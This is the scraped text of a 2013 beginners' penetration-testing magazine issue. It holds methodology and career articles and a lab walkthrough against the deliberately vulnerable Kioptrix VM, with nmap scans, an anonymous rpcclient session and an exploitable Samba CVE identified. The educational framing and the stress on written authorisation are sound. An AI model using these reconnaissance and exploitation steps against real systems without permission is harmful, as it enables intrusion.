PenTest StarterKit 2013

Published on December 2016 | Categories: Documents | Downloads: 35 | Comments: 0 | Views: 562
of 70
Download PDF   Embed   Report

Penetration testing with Kali Linux

Comments

Content

Cyber Security Auditing Software

Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can
examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.
www.titania.com

With Nipper Studio penetration testers can be experts in
every device that the software supports, giving them the
ability to identify device, version and configuration
specific issues without having to manually reference
multiple sources of information. With support for around
100 firewalls, routers, switches and other infrastructure
devices, you can speed up the audit process without
compromising the detail.

You can customize the audit policy for your customer’s
specific requirements (e.g. password policy), audit the
device to that policy and then create the report detailing
the issues identified. The reports can include device
specific mitigation actions and be customized with your
own companies styling. Each report can then be saved
in a variety of formats for management of the issues.
Why not see for yourself, evaluate for
free at titania.com

Ian has been working with leading global
organizations and government agencies to
help improve computer security for more
than a decade.
He has been accredited by CESG for his security and
team leading expertise for over 5 years. In 2009 Ian
Whiting founded Titania with the aim of producing
security auditing software products that can be used by
non-security specialists and provide the detailed
analysis that traditionally only an experienced
penetration tester could achieve. Today Titania’s
products are used in over 40 countries by government
and
military
agencies,
financial
institutions,
telecommunications companies, national infrastructure
organizations and auditing companies, to help them
secure critical systems.
www.titania.com

CONTENTS

HOW TO START

Dear PenTesters!

W

e are proud to announce a new line of our Magazine – Pen-

06 Basics of Pentest:
A Lesson for Beginners
By Nishant Raman

Test StarterKit. It's a magazine dedicated especially (but not

How to Start a Pentest is a big concern and question
in the mind of any beginner who is going to conduct a
pentest for the first time. Knowing about the various
tools is always an interesting part for any ethical hacker but to begin any pentesting assignment you should
have a better approach and plan.

only) for newbies and pentesting enthusiasts, who would like to
gain more experience and knowledge.
Conducting the penetration test for the first time might be a big
concern for some of you who haven't tried it yet. That's why we open
this issue with the section: 'How To Start', where you will find an article 'Basics of PenTest' by Nishant Raman, who describes there how
to start a penetration test. Yury Chemerkin, our expert who made
one of the covers of PenTest Magazine, in his article gives some tips

10 Pentester Career: How to Begin?

on how to begin a pentester career. The section closes with Fran-

By Yury Chemerkin

cesco Perna's article 'Professional Penetration Testing: How to Get

You will learn what to take into consideration when
assessing you pentest knowledge. Is it degree, skills,
certifications or maybe knowledge of programming
languages? Moreover, you will get answers to questions like: What to learn or what to do to become a
pentester? How to improve your pentester skills? Finally you will learn what skills each pentester should
possess and how to gain them.

Started', where he presents security testing methodologies.
Next, you will find an article 'Penetration Testing with Nessus' by
Dan Robel. In there, you will learn what kind of troubles penetration
testers have to face nowadays.
From the article 'BackTrack for Pentesting?' by Lloyd Wilke, you
will get to know that using Backtrack makes it easy for a pentester
to get his/her hands on the required tools to do a good job in finding
security exploits in the systems.
In 'Network Scanning: The Basic Tools' article, Enrique Sanchez explains the basic techniques used under the hood of great

12 Professional Penetration Testing:
How to Get Started?

scanners such as nmap and so forth. In his day-to-day job, author

By Francesco Perna

is a member of Accuvant LABS Enterprise Attack and Penetration

The first approach to penetration testing activities
seems like black voodoo arts to anyone who hasn't
ever considered the computer security problems. The
truth is that in these kind of activities no magic art is
involved and no supernatural power is necessary in
order to proceed. All you need for successful penetration testing is a fully functional "/dev/brain", very specific technical preparation, strong knowledge of security testing methodologies, a little bit of fantasy and a
lot of practice.

Testing team.
Than, you will have a chance to acquire knowledge about Blind
Command Line Injection (BCLIi) while reading Chris Duffy's article.
From 'CSRF Testing and its Protection Using RequestRodeo'
contributed by Nitin Goplani, you will learn more about Cross Site
Request Forgery (CSRF), which is one of the most common attacks
on the Internet nowadays.
Hitesh Choudhary, an ethical hacker, in his 'Python for Coders
and Pentesters' article, demonstrates how to write a web crawler in
Python.
In the section 'Let's Talk About Security' you will find an article entitled: 'Pentesting a Nation – Is Australia Safe From Attack?',

PENTESTING WITH TOOLS

20 Penetration Testing with Nessus

where thanks to its author – Colin Renouf, you will have an opportu-

By Dan Robel

nity to look at some of the wider issues related to penetration testing

In the last 10 years, cybersecurity has become a
household word, and due to the growth of critical infrastructure and an exponential increase in the related
threat of cyber-attack, dominates every conversation
we have about securing this critical infrastructure.
From this article you will learn what troubles have to
face penetration testers nowadays.

and security – the “A” (availability) in the CIA security triad.
Last but not least, is an interview with Rod Soto, the winner of
last year's Black Hat hacking competition, a security researcher and
a board member of HackMiami. We are sure you will find this interview as well educative as inspiring.
We hope you will enjoy your reading!
Kamil Sobieraj & PenTest Team

26 BackTrack for Pentesting?
By Lloyd Wilke

BackTrack makes it easy for a pentester to get his/her
hands on the required tools to do a good job in finding security exploits on systems. It also allows the

StartKit 01/2013(01)

Page 4

http://pentestmag.com

CONTENTS

so-called “script kiddies” access to professional tools that is so easy to
use that they can exploit systems without understanding what has been
achieved.

32 Network Scanning: The Basic Tools
By Enrique Sanchez

This article will try to explain the basic techniques used under the hood
of great scanners such as nmap and so forth. This will allow the reader to
have not only a better understanding of how the network scanners work
on the discovery phase, but also be able to implement their own scanners or use other programs to gather this information in the case nmap or
other tools would trigger IDS signatures and the engagement requires not
being caught by it (Red Team).

POTENTIAL ATTACKS & DEFENsE METHODS
46 Blind Command Line Injection
By Chris Duffy

Blind Command Line injection (BCLIi) is when a web application allows
operating system commands to be executed through it with no confirmation of execution. BCLi is typically found on poorly coded applications
that allow access to files or data through a web interface. Read this article
to get more information about the BCLIi.

50 CSRF Testing and its Protection Using RequestRodeo
By Nitin Goplani

Editor in Chief: Ewa Dudzic
[email protected]
Managing Editor: Kamil Sobieraj
[email protected]
Associate Editors:
Patrycja Przybyłowicz
[email protected]
Ewa Duranc
[email protected]
Zbigniew Fiołna
[email protected]
Editorial Advisory Board:
Jeff Weaver, Rebecca Wynn
Betatesters & Proofreaders: Vaman Amarjeet,
Gregory Chrysanthou Balogun, Ayo TayoBalogun, Jeff Weaver, Amit Chugh, Pinto Elia,
Ewa Duranc, Jeff Smith, Julian Estevez, Rod
MacPherson, Scott Christie
Senior Consultant/Publisher: Paweł Marciniak

Cross Site Request Forgery (CSRF) is one of the most common attacks
on the Internet today. The attackers find it easy to exploit it as it does not
require any authentication information, session cookies but only the user
to be authenticated to the application. Furthermore, it is possible on every
platform and it does not matter which authentication type application uses.

CEO: Ewa Dudzic
[email protected]
Art Director: Ireneusz Pogroszewski
[email protected]
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca
[email protected]

56 Python for Coders and Pentesters
By Hitesh Choudhary

Python programming language was gift to Web world by Guido van Rossum. Most of the time InfoSec evangelists need to write their Proof Of
Concept [POC], we need to automate our attacks or customize some of
our tools and these tasks can create a lot of headaches.

LET'S TALK ABOUT SECURITY

58 Pentesting a Nation – Is Australia Safe From Attack?
By Colin Renouf

This article looks at some of the wider issues related to penetration testing
and security – the “A” (availability) in the CIA security triad – and how an
attack on inadequate national infrastructure could impact a global system.

INTERVIEW

62 Interview with Rod Soto
By PenTest Team

Rod Soto is a security researcher and board member of HackMiami. He is
a regular speaker at hacking conferences all over the country on the topics of penetration testing tools and methods, as well as the topic of digital civil liberties. He will tell us about his experience in the pentest field.

StartKit 01/2013(01)

TEAM

Page 5

Publisher: Hakin9 Media
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com
Whilst every effort has been made to ensure the
high quality of the magazine, the editors make
no warranty, express or implied, concerning the
results of content usage.
All trade marks presented in the magazine were
used only for informative purposes.
All rights to trade marks presented in the
magazine are reserved by the companies which
own them.
DISCLAIMER!
The techniques described in our articles may
only be used in private, local networks. The
editors hold no responsibility for misuse of
the presented techniques or consequent data
loss.

http://pentestmag.com

HOW TO START

Basics of Pentest:
A Lesson for Beginners
This article is written for beginners who have just started their
career in the security domain as pentesters and are planning to
become a successful ones. 'How to Start a Pentest' is a big concern
and question in the mind of any beginner who is going to conduct
a pentest for the first time.

K

nowing about the various tools is always an
interesting part for any ethical hacker but
to begin any pentesting assignment you
should have a better approach and plan. This article will focus in depth on what approach should
be taken to start a pentest.

Scenario

Very often, at the beginning of a pentest, you will
face two types of situations.

Let’s have a closer look at the Methodology of a
pentest (see Figure 1).

Step 1: IPs

If performing the scenario II, you have only email
ID or Domain name with you. From here the very
first thing you need to find out is the IP address
registered with the organization for which you are
conducting the pentest activity. To get the IP address' details you can use various tools and web-

• The Organization who wants to conduct the
pentest on their network provides you with just
a list of IP Addresses.
OR
• The Organization provides you with email address or domain name only.
Considering both of the scenarios, you will have
bunch of queries in your mind: how to start, what
to do, what would be the first step, etc. So without examining your zeal let's see 'How to Start a
Pentest'

Approach

When knowing about both the scenarios, the very
first step is to go through the methodology in order
to set up the positive flow of your pentest activity.
StartKit 01/2013(01)

Figure 1. Methodology of a pentest

Page 6

http://pentestmag.com

sites, such as: www.whois.net, www.Yougetsignal.
com, www.whois.sc, www.dnsstuff.com etc.
After getting the IP address' details you will have
another question in your mind: should I do the pentest on all the registered IPs? The answer is 'NO'.
You cannot decide at that moment. You will have
to find all the active or usable IPs first. Remember
that most organizations keep some of their IPs as
spare ones, so there is a very big possibility that
you can get less number of active IPs than registered IPs.
To find out all the active IPs you can use various
IP scanner tools, such as: Angry IP (see Figure 2),
superscan, Hping, etc.
Note that to get the exact number of active IPs you
need to perform multiple scans because there is a
possibility that, during a scan, some of the devices
can be down or inactive. This should allow you to
gather the information about all the active IPs.
To get further information about the organization
network infrastructure you can also visit the websites with job offers and analyze the requirements
related to the organization.
Example
If organization has posted their requirement on job
website for Oracle DBA and Fortigate firewall specialist, this means that they use oracle database
and Fortigate firewalls so you can prepare your
test plan accordingly and try to get more information about this in the next steps of pentest.

Step 2: Port Scanning

This step is very important during the pentest
activity. The previous one let you find the active
IPs, now it is turn to perform the Port Scanning
on those IPs. During port scanning you will not
only gather the information about ports but most
probably you will also get some details about
services, Operating System, version of OS and
services. For this purpose you can use tools like
ZenMAP (see Figure 3), NMAP (see Figure 4), and
SuperScan, etc.
When having the information about open ports,
services' and Operating Systems' versions gathered, you need to do some exercise and R&D to
collect, using your skills, some other details about
the Operating System and services.

Step 3: Vulnerability Scan

Now you have to do the vulnerability scanning of
each IP address. This will allow you to get information about the vulnerabilities pertaining to the OpStartKit 01/2013(01)

HOW TO START
erating System, services, and application running
on devices or servers associated with active IPs.
For this purpose you can use network and application vulnerability scanner tools like Nessus, Retina, AppScan, Accunetix, etc.
Once the scanner has generated a report you
need to analyze it deeply and understand the
weaknesses or loop holes found in the report.

Step 4: Research and Exploitation

This step is a bit difficult. You need to perform exploitation of loop holes which you have found during steps 2 & 3.
The process of exploitation will let you compromise the server or device and gain access to it.
To get this accomplished, you need to have deep
hands on experience on Metasploit Framework
and Backtrack.

Suggestions

Figure 2. Angry IP Scanner

To be a good pentester you should have deep
theoretical as well as practical concept. You
need to get as much experience as possible with
some of the tools mentioned (NMAP, Metasploit,
Backtrack, vulnerability scanner tools, etc.). You
should be active on information security related
blogs and spend good amount of time on R&D
and vulnerabilities research. You need to keep
yourself up to date regarding the zero day vulnerabilities and exploits. And never forget that it is
your zeal of learning that will play the key role in
your success.

Figure 3. ZenMap Port Scanner

Nishant Raman

Figure 4. Nmap Port Scanner
StartKit 01/2013(01)

Nishant Raman is  the Founder and
Chairman of CydCon IT Solutions Pvt.
Ltd. New Delhi India.  He has experience in ethical hacking and web application pentesting. Being a security consultant for the last seven years
he is continuously helping IT, Banking
and non IT organization to improve
their applications and network security. He is working not only for the domestic clients, but is
providing his consultancy all over the world.
Page 8

http://pentestmag.com

Pescara
Via Colle Scorrano, 5
65100 Pescara
F. +39 0857992241
[email protected]

Roma
Piazza G. Marconi,15
00144 Roma
T. +39 0632803612
F. +39 0632803283

www.quantumleap.it

HOW TO START

Pentester Career:
How to Begin?
Someone starts with talking about degree, another says that
nothing except fundamentals matters. You can get some
significant part of whole knowledge before college even or do not
anything useful after degree even.

T

hat is not a talk about how your degree affects your skills, it does not affect, because
the practical skills might have something with
'fundamentals' if they are on the same way and lead
you to the same goal. Not every country has such
educational institutes (maybe Germany has). You
are allowed to argue against both sides or choose
your own where there is a place to solve different
problems instead of misplacing them. This case is
often extended by certifications; it matters, no doubt,
especially when you know that someone who hires
you looks for it. However, you may find another way
to tell them you can manage with such projects that
depend on your additional skills such as programming. I mean you can develop your own tools/exploit by yourself, participate in open-source groups
that aims it too, you can improve some tool/exploitation mechanism or automatize it, mix several tools,
redevelop it even. It helps to understand how OS
components link and work together as well as break
into system. In course of debates which languages
must be learnt, there are two kinds that depend on
OS (under Windows OS – C/C++, Assembler, under
Linux/RedHat/CentOS – Python, Ruby). However, it
does not mean you should limit yourself to these languages, as a software develops with many other languages, software may have popular add-ons written
by someone who prefers .Net or have to use it.
StartKit 01/2013(01)

Besides, do not forget you should not only develop something but pentest too. It does not mean you
should stop to improve your skills; there are many
out-of-box tools or solutions you have to learn and
use, like BackTrack. It must be a need to improve
or custom them in order to network, system or other
specifications. Being a part of team, like Hacker for
Charity (http://www.hackersforcharity.org/), helps
to collect all skills among system security, network
security, application security, etc. On the another
hand, getting forensics skills may help too. Therefore, learning and practicing with home networks,
corporate sandboxes, bypassing NAC, VLANs and
finding loopholes in isolated segments that helps
understanding stacks, buffer and memory and their
vulnerabilities. In addition, you can learn specific
technology such AVR: this kind of programming involves a C/C++ knowledge as well.
Anyway, first steps on this field might involve
reading books, but almost all of books (except Syngress Publishing house) are rewritten, redesigned
of each other that brings old techniques, and old
tools. So, it is better to find books such as shellcoders and grayhat-coders books and Pentest
guidelines (e.g. http://www.pentest-standard.org,
http://www.vulnapps.com/) and standards (NIST
SP 800-42). As said earlier, you can not focus on
certain language, software or technology not to

Page 10

http://pentestmag.com

end with pure knowledge. No one loves Delphi but
enough tools to research applications implement
Delphi libraries (and written too). You should collect information about every technology, system,
software from any possible sources:
• Infosecurity blogs, news (like http://www.vulnapps.com/ or http://exploit-exercises.com/)
• Books and ebooks (like The Art of Software Security Assessment, or The Art of Exploitation)
• Vulnerabilities domains (like http://www.exploitdb.com/)
• security conferences/events (each possible,
not only top known such DefCon)
• templates and charts (http://pentestmonkey.
net/category/cheat-sheet)
• special guidelines and frameworks (like OffSec
guidelines)
It is quite important to have all of these (and not
only them) skills, because the key difference between such tester and someone else is an ability to answer and explain vector attacks, potential
ways to attacks, and discreet information you have
per each who you interact. It means don’t overload
CEO with full-detailed technical reports generated
by Nessus or another tool. As final thoughts, you
should have different broad skills on
• Networks solutions (software, protocols, and
hardware);
• Techniques of attacking and defensing of IDS,
Firewalls, AV, embedded and third party security software;
• Top known tools and software to gathering data;
• Forensics and intelligence techniques to get
evidence;
• Human security techniques (social engineering
and physical security);
• Participating at the CTFs and conferences;
• Simply be involved to gain and share knowledge with smart guys;
Good luck,

Yury Chemerkin

Currently in the postgraduate program at RSUH on the
Cloud Security thesis. Experience in Reverse Engineering, Software Programming, Cyber & Mobile Security
Research, Documentation, and as a contributing Security Writer.
StartKit 01/2013(01)

HOW TO START

Professional
Penetration Testing:
How to Get Started
The first approach to penetration testing activities seems like black
voodoo arts to anyone who hasn't ever considered the computer
security problems. The truth is that in these kind of activities no
magic art is involved and no supernatural power is necessary in
order to proceed.

A

ll you need for successful penetration testing is a fully functional /dev/brain, very
specific technical preparation, strong knowledge of security testing methodologies, a little bit
of fantasy and a lot of practice.
Many think that Penetration Testing is an activity
reserved only to the hackers. This is partially true:
a good hacker could be a penetration tester but
penetration tests' activities are a complete different
story from hacking. When talking about hacking,
there's no applicable rule, the limit to the "activity"
resides only in the hacker's imagination. An hacker doesn't follow any public available methodologies, doesn't need to be clear in the vulnerability
explanation, and also doesn't have to write reports!
Hackers just hack to reach their own objectives in
the way they prefer. Contrary to hacking, made for
fun, for research or in any of its forms, penetration tests are meant to companies and organizations that need either to verify if their security level meets certain requirements (state regulations,
company policy, international standards and so on)
or to evaluate risks related to the findings. That's
why, in order to be effective, a penetration test
activity must be executed with formalisms understood by the Customer, both in the test execution
and in the way the identified vulnerabilities are reported in.
StartKit 01/2013(01)

In this article you will learn some of the basis of
penetration testing. First of all, a little bit of penetration tests' theory will be discussed, then some
basic techniques used during a penetration test
will be showed through pratical approach applied
to system vulnerable by design. I have assumed
that the reader is familiar at least with the basic
concepts of security and TCP/IP. The practical
examples are made using the commonly available security tools shipped with the Linux distro
BackTrack 5 R3[1] against kioptrix vm (level 1)
[2]. Although the BackTrack isn't a new trend in
penetration testing distros, we decided to use
it due to large number of tutorial that a beginner can find on the Internet. Obviously, you don't
have to use it. If you feel more comfortable using Kali, Backbox, Debian, Slackware, Ubuntu, a
hundred of linux distributions, OSX or Windows,
then use it.

What is a Penetration Test
and what is it for

A penetration test could be defined as a method
used to evaluate the security level of a set of assets. The goal of a penetration test, despite the
name, is no longer breaking or penetrate into a
system. Instead, it is to identify, through a scientific methodology, the security level of the evaluated

Page 12

http://pentestmag.com

assets. I'm talking about asset instead of computer, network, and system because, in a 'holistic' perspective, a penetration test isn't necessary intended for technological stuff. Below are listed the main
advantages of following a scientific methodology:
• penetration tests are conducted thoroughly and
the results are consistent: if anyone repeat the
penetration test using the same methodology
on the same asset, he or she should (net errors) obtain the same results;
• results leave no room for interpretation and
what is asserted can be demonstrated through
the evidences collected during the analysis.
Furthermore, penetration test results are measurable in a quantitive way that depends from
the adopted methodology;
• posture towards penetration test comply with
the law. This is really important, especially if
something goes wrong. It's crucial that at least
the following legal aspect are met:
• a penetration test may only occur after a clear
analysis of both the regional laws for the security professional and for the Company or the
Organization being tested;
• a penetration test may only occur after the signature of a written permission by the Customer. I used the term 'written permission' because
a permission sent by e-mail, and, in some
countries, even by fax, isn't enough to protect
and your Company from lawsuits. Consider
consulting a lawyer to define the terms of the
written permissions.
Remember that during a penetration test the security professional is legally responsible for his action
so, quoting a friend of mine, 'Cover your ass!'.
There are several kinds of penetration tests, and
each one's methodology is different from the other.
The common denominator between these different
methodologies is the information provided to a security professional and customer's employees: the
less information is shared, the more the test will be
reliable in simulating a real threat.

Penetration Test Methodologies

There are several methodologies to conduct a successful penetration test. Depending on the methodology the different steps of the penetration test,
such as posture review, report of the findings or
risk evaluation may vary. To my knowledge, the
most widely used methodologies are the following
ones:
StartKit 01/2013(01)

OSSTMM [3]

The Open Source Security Testing Methodology
Manual (OSSTMM) is a peer-reviewed manual of
security testing and analysis released by the ISECOM (the Institute for Security and Open Methodologies). The OSSTMM concern operational security and propose a scientific method to measure
how well security works. Beside technical aspects,
OSSTMM keeps in serious consideration the legal
and ethical aspects related to security tests. The
ISECOM provide also a set of professional certifications related to the methodology;

ISSAF [4]

The Information Systems Security Assessment
Framework (ISSAF), relased by OISSG (Open Information Systems Security Group) provide validation for bottom-up security strategies, such as penetration testing as well as top-down approaches,
such as the standardization of an audit checklist
for information policies;

OWASP [5]

The Open Web Application Security Project
(OWASP) testing guide, relased by the OWASP
Project, is a methodology focused on web applications penetration testing. The OWASP methodology propose also its own risk analysis strategy.
The choice of methodology is really important as
it deeply affects the way you work: it is really important to deeply understand a chosen methodology before applying it. Each methodology requires
different way of proceeding, collecting information,
report the findings and evaluate the related risks.
To clarify, the previously listed methodologies are
only an example and I don't want to imply that they
are better than other existing methodologies: every methodology has its own strengths and weaknesses and it is your responsibility to understand if
it fits your needs.

Rules of Engagement

Methodologies define a way to approach a penetration test safely and professionally. Depending
on the adopted methodology the way to approach
the penetration test may be slightly different. Regardless of the adopted methodology, please be
sure to comply at least with the following rules of
engagement:
• Penetration test scope definition: you need to
verify with the Customer the scope of the penetration in terms of number of targets, accept-

Page 13

http://pentestmag.com

HOW TO START
able practices, involved parties and time window. During the scope definition you should be
able to identify any obviously insecure or unstable system and should avoid to test them. It
is crucial to have this information to define the
necessary effort and the involved perimeter;
• Contract terms definition: The contract should
include also a line of communication and emergency contacts. One of the most important aspects in professional penetration testing is the
confidentiality. Regardless the existence of a
non-disclosure agreement, you must not reveal
any information acquired from the customer nor
the results of testing to third parties not identified by the customer as referents for the penetration test. Although, the penetration test conducted professionally should not be destructive,
you need to clearly state in the contract dangers, risks, and limitations related to the penetration test activities. The contract must include
the written authorization to proceed with the security tests. Be sure to include inside the written authorization signed by the Customer at
least the information related to the perimeter,
the acceptable practices, the time window and
the source of analysis (like the originating IP Address for the attack simulations, telephone numbers used during war dialing, etc.);
• Technical activities: first of all, and this is a
golden and inviolable rule, you must operate
respecting the law. Remember that you're the
only responsible of that. Trace all your activities, both on your system and on the Customer's ones, in order to protect yourself in case of
troubles. Keep every information acquired during the test safe and secure in order to guarantee confidentiality. Don't be destructive and
don't carry out any intentional denial of service attack against the target. Never use tools
that you don't know properly: you can cause
potential damages and this is unacceptable. If
in doubt about the eventuality of causing damage with a test, inform the Customer first and
obtain the authorization, preferably in written
form, to carry out the specific test. If you discover a breach during your activities, suspend
immediately the penetration test and inform
the Customer. Last but not least, at the end of
a penetration test, clean the targets from anything that you may have installed during the
analysis;
• Reporting: the report is what, eventually, summarizes the outcome of a penetration test. It
StartKit 01/2013(01)

should contain all the issues discovered during the penetration test along with the evidences and the necessary steps to reproduce these
issues. The report should also contain a practical solution to the reported issues. The report
must be transmitted, maintaining its confidentiality end-to-end, and the customer must know
the implications of uncontrolled diffusion of the
information inside it.

Pentest Simulation Scenario

Let's start with a simulation of a penetration test.
I am assuming at this point that all the legal and
non technical aspect are sorted out (such as the
Customer having signed the contract and written
authorizations). The scope of this simulated penetration test is a single system connected to the
Customer's network and your task is to start with an
analysis of the system. In my simulation the target
(that is the kioptrix) has IP address 192.168.1.105
and my system (that is BackTrack) has IP address
192.168.1.107.

Penetration Test Simulation: Setup the
Logging

The first activity in a test is to setup the logging
environment for both the shell and network traffic.
In my setup I connect through SSH to my BackTrack and I directly log all the commands sent to
the shell. On a Windows system you can use PuTTY [6], or something equivalent, to log the whole
session. Figure 1 shows how to configure PuTTY
to enable session logging.

Figure 1. PuTTY session logging

Page 14

http://pentestmag.com

Under Linux and Unix-like systems it is possible
to log the session using the OpenSSH [7] client
and the tee command, as I show in Listing 1.
Once logged into the BackTrack host, I suggest
you to customize your shell prompt to include information such as the day and time. This is a useful
trick to piece together the time-line of the simulated attack. Listing 2 shows how to setup this customized prompt using the bash [8] shell.
The next step is to setup the logging of network
traffic; for this task I use the tcpdump utility. Usually
I log the traffic of the whole target's subnet in order
to identify any spurious or unexpected response.

In this specific case, because the systems are directly connected, I only log the network traffic involving the kioptrix system. Listing 3 shows how to
use tcpdump to log the network traffic.
After these preliminary steps, it is time to proceed with the analysis.

Penetration Test Simulation: Services
Enumeration

I am assuming here that your familiarity with the
TCP/IP protocol suite. The first step to analyze
the security of the target is to identify the services that it exposes. To identify these services I use

Listing 1. SSH session logging
$ ssh [email protected] | tee ~/ssh-output.log

Listing 2. Custom prompt
$ export PS1="[\d \t \u@\h:\w]$ "

Listing 3. Network traffic logging>
$ tcpdump -i eth0 -n -s0 -w PT-LOG.pcap host 192.168.1.105

Listing 4. TCP ports/services enumeration
$ nmap -sS -sV -P0 -O -n -p 1-65535 192.168.1.105
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:58 CEST
Nmap scan report for 192.168.1.105
Host is up (0.00030s latency).
Not shown: 65529 closed ports
PORT
STATE SERVICE
VERSION
22/tcp
open ssh
OpenSSH 2.9p2 (protocol 1.99)
80/tcp
open http
Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4
OpenSSL/0.9.6b)
111/tcp
open rpcbind
2 (RPC #100000)
139/tcp
open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp
open ssl/http
Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4
OpenSSL/0.9.6b)
32768/tcp open status
1 (RPC #100024)
MAC Address: 08:00:27:A9:9E:29 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/
.
Nmap done: 1 IP address (1 host up) scanned in 22.02 seconds

StartKit 01/2013(01)

Page 15

http://pentestmag.com

HOW TO START
the nmap port scanner. In the specific, I perform
a full port scan with the SYN scan technique, this
in order to identify also services that are on nonstandard ports. Listing 4 shows how to use nmap
to perform this task.
After identifying the TCP services exposed
by the target, it is time to discover if it exposes any UDP service. Differently from the TCP
case, to identify whether or not an UDP port is
open, nmap has to send active solicitations using commands pertinent to the specific service,
supposed to be resident on a certain port. This
means that if a service is exposed on a non standard port, or if the service does not recognize the
requests made by the port scanner, nmap will report the port as closed\filtered. This also means
that it makes no sense to scan the whole udp port
range. The way I perform the UDP scan is shown
in Listing 5.

Figure 2. Target Creation

A brief analysis of the port scan results shows
us that the target has at least an outdated service,
for example, the Apache daemon listening on ports
80 and 443, and at least a security misconfiguration, since the ssh daemon listening on port 22 is
configured to support the version 1 of the protocol.
It is furthermore possible to see in the results that
the target exposes the netbios protocol using the
samba daemon. Depending on the methodology,
the port scan results are also useful for the risk
evaluation. These results are the starting point for
further analysis aimed at identifying vulnerabilities
of the target.

Penetration Test Simulation:
Vulnerabilities Identification

The process of identifying target's vulnerabilities
can be simplified by using a vulnerability scanner.
The vulnerability scanner which I use in this simulation is OpenVAS[10] and all the described actions are submitted to the engine trough the web
interface. Please, refer to the manual to set up
properly this vulnerability scanner. To start a scan
you have first to define the target. This could be
done through the menu "Configuration -> Targets"
(Figure 2).
After the target creation I proceed with the scan.
In order to start a vulnerability scan, you have first
to create a task through the menu "Scan Management -> New Task" (see Figure 3) and then start
the created task (see Figure 4). In a real world scenario you must also verify that the selected scan-

Listing 5. UDP ports/services enumeration
$ nmap -sU -P0 -O -n 192.168.1.105
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:37 CEST
Nmap scan report for 192.168.1.105
Host is up (0.00035s latency).
Not shown: 996 closed ports
PORT
STATE
SERVICE
111/udp
open
rpcbind
137/udp
open
netbios-ns
138/udp
open|filtered netbios-dgm
32768/udp open|filtered omad
MAC Address: 08:00:27:A9:9E:29 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1086.79 seconds

StartKit 01/2013(01)

Page 16

http://pentestmag.com

ning policy does not contain any check that could
cause a Denial of Service. In this test case, the
default settings are enough. The vulnerability scan
will take some time to be completed, what means
that this is a great while for a coffee.
Analyzing the output of the vulnerability scan, it is
possible to identify 69 security issues that require
manual verification. At this point, for each identified
vulnerability, it is necessary to check the listed references, in order to spot any potentially exploitable
service. Note that the results provided by OpenVAS are not complete: for example, the vulnerability scanner did not find any vulnerability affecting
the samba daemon. Besides the specificity of this
test case, the steps that are involved in identifying
vulnerabilities are similar to the ones described in
this example, also if you use a different scanner.
Another way to identify vulnerabilities is based on
the banners exposed by the services enumerated
during the port scan and on the information that can
be obtained by inspecting the network traffic. Basically it is possible to find on the Internet public disclosed
vulnerabilities for the services identified on the target.
This method, when applied in a real scenario, could
take a long time, particularly if you have to analyze
a lot of targets. Anyway, it could be useful in some
cases, especially when the vulnerability scanner fails
to identify the vulnerabilities for you. To demonstrate
this method I proceed with the analysis of the vulnerabilities related to the samba daemon.
First of all it is necessary to generate some traffic directed to the samba daemon. During the net-

work scan I was able to identify the samba workgroup name, MYGROUP, so I will try to connect
to the daemon using an anonymous session while
recording the network traffic with tcpdump. Listing
6 shows the rpcclient command line options which
I use to connect to the samba daemon.
As shown in Listing 6 the connection is successful. It is thus the time to analyze the network traffic
using Wireshark[11]. Using the display filter "frame
contains Samba" it is possible to identify the version running on the target: Samba 2.2.1a. Figure 5
shows the captured packet that contains this juicy
information. Using the cvedetails[12] website it is
possible to look for any remotely exploitable vulnerability for samba version 2.2.1a. In this case
there is a vulnerability, that is CVE-2003-0201, that
is remotely exploitable using a metasploit module.
Figure 6 shows the search results.

Penetration Test Simulation: Vulnerability
Exploitation

Exploiting the vulnerability is straightforward. Thanks
to metasploit [13], it is possible with just few comListing 6. rpcclient connection to samba daemon
$rpcclient -I 192.168.1.105 -w MYGROUP -U "%"
rpcclient $>

Figure 5. SMB Packet containing samba daemon version
information

Figure 3. Task Creation

Figure 4. Vulnerability Scan Start
StartKit 01/2013(01)

Figure 6. CVE-2003-0201 vulnerability details
Page 17

http://pentestmag.com

HOW TO START
References

[1] BackTrack 5 R3 – http://www.backtrack-linux.org/downloads/
[2] Kioptrix VM Level 1 – http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar
[3] OSSTMM Methodology – http://www.isecom.org/mirror/
OSSTMM.3.pdf
[4] ISSAF Methodology – http://www.oissg.org/files/issaf0.2.1.pdf
[5] OWASP Methodology – http://www.owasp.org/images/5/56/
OWASP_Testing_Guide_v3.pdf
[6] PuTTY – http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

[7] OpenSSH – http://www.openssh.org/
[8] Bash reference manual – http://www.gnu.org/software/bash/
